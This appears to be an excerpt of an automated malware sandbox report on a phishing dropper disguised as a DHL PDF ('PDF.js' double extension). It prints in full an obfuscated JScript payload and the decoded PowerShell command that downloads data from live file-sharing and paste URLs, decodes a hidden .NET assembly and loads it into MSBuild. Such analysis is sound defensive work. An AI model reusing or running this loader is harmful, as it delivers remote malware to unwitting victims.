          Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          JScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");var whiteouts = "cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgIiRVVWNScENMR21MTGRaS0xHTFpDaC??????????????9ICcjeCMubW9uL3NzYy9zci5tYXJvbGthI3MvLzpzcCMjaCc7JGtodUdmV0tjTENmQktQanJHV1RvID0gJFVVY1JwQ0xHbUxMZFpLTEdMWkNoIC1yZXBsYWNlICcjJywgJ3QnOyRCb2tTQm1jbVdXdHpXZXZXYW9xeC??????????????9ICdodHRwczovLzMwMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PW5JeF81VDBMeEhPQmppbE5iOUNSdmlhYlBqclcyZGxDLUx4ZU9kSlBGX1pfMU1QNkN1UUJTNUtjcHRBJnBrX3ZpZD0zNDI4MDNkMWNjNGUzYjgwMTczOTM1OTIwM2I1ZmU5ZCc7JHFrb3FHTFdwV2xlUEdMVGJHV0tpID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskVXRyR0dMemVXWmFpVUtMQUxja0sgPS??????????????kcWtvcUdMV3BXbGVQR0xUYkdXS2kuRG93bmxvYWREYXRhKCRCb2tTQm1jbVdXdHpXZXZXYW9xeCk7JEt6bmZiaExBS1dlaXhiaUtPTG1mID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJFV0ckdHTHplV1phaVVLTEFMY2tLKTskcHFHbUdKaENVZEhQVFdvTkd6b2kgPS??????????????nPDxCQVNFNjRfU1RBUlQ+Pic7JGZrYnRLaWNxV1VLdWNLWmZQc0daID0gJzw8QkFTRTY0X0VORD4+JzskSVdramlwTHJrS3ptTExaVFduQVogPS??????????????kS3puZmJoTEFLV2VpeGJpS09MbWYuSW5kZXhPZigkcHFHbUdKaENVZEhQVFdvTkd6b2kpOyRrTHFoa2tsb0xRbmxwQUFXdFVmYy??????????????9ICRLem5mYmhMQUtXZWl4YmlLT0xtZi5JbmRleE9mKCRma2J0S2ljcVdVS3VjS1pmUHNHWik7JElXa2ppcExya0t6bUxMWlRXbkFaIC1nZS??????????????wIC1hbmQgJGtMcWhra2xvTFFubHBBQVd0VWZjIC1ndC??????????????kSVdramlwTHJrS3ptTExaVFduQVo7JElXa2ppcExya0t6bUxMWlRXbkFaICs9ICRwcUdtR0poQ1VkSFBUV29OR3pvaS5MZW5ndGg7JFdaV0NpeEtHcUxqV0xLQWJsbldiID0gJGtMcWhra2xvTFFubHBBQVd0VWZjIC0gJElXa2ppcExya0t6bUxMWlRXbkFaOyRCcWZia1BtaUdLUFdtS054bENDUi??????????????9ICRLem5mYmhMQUtXZWl4YmlLT0xtZi5TdWJzdHJpbmcoJElXa2ppcExya0t6bUxMWlRXbkFaLC??????????????kV1pXQ2l4S0dxTGpXTEtBYmxuV2IpOyRpenBkY09OY2F1V1BmY3p1V1pOUy??????????????9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEJxZmJrUG1pR0tQV21LTnhsQ0NSKTskR3RVTE5PS2hsY2lvdXRidUFMa3??????????????gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRpenBkY09OY2F1V1BmY3p1V1pOUyk7JGFQb3pXR3VXUGZrY3pkcEtTcWRLID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dIE??????????????oJGtodUdmV0tjTENmQktQanJHV1RvLCcnLCcnLCcnLCdNU0J1aWxkJywnJywnJywnJywnJywnQzpcUHJvZ3JhbURhdGFcJywnbWFybHknLCdqcycsJzEnLCcxJywncGVzc2FyaWVzJykpIg==";whiteouts = whiteouts.replace(/??????????????/g, "A");var balafon = spiritist.decode(whiteouts);chamade.Run(balafon, 0, false);IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\3472.js.csv");ITextStream.WriteLine(" entry:44784 f:Salesians a0:%22h%C3%A0%C2%AF%E2%80%94%C3%82%C2%BB%C3%9E%C2%A0%C3%A2%C2%A4%C2%B7%C3%A2%C2%A0%C2%A3%C3%A2%C2%AA%C2%B8%C3%A2%C2%81%C2%A8%C3%85%C2%9D%C3%9F%C2%AB%C3%A2%E2%84%A2%C2%9D%C3%A2%C2%B4%C6%92%C3%A0%C2%AE%");ITextStream.WriteLine(" exec:37410 f:Salesians");ITextStream.WriteLine(" exit:44784 f:Salesians r:%22https%3A%2F%2Fpaste.ee%2Fd%2FFsssIAil%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:44779 o: f:open a0:%22GET%22 a1:%22https%3A%2F%2Fpaste.ee%2Fd%2FFsssIAil%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/FsssIAil", "false");I
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041A8DA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84868752B push ebx; iretd 2_2_00007FF84868756A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8486800BD pushad ; iretd 2_2_00007FF8486800C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004000D8 push es; iretd 8_2_004000D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040008C push es; iretd 8_2_0040008D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004542E6 push ecx; ret 8_2_004542F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0045B4FD push esi; ret 8_2_0045B506
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00432BD6 push ecx; ret 8_2_00432BE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00454C08 push eax; ret 8_2_00454C26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004063C6 ShellExecuteW,URLDownloadToFileW,8_2_004063C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_00418A00

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses an obfuscated file name to hide its real file extension (double extension)
          Source: Possible double extension: pdf.jsStatic PE information: DHL RPA GRBP Template.PDF.js
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041A8DA
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
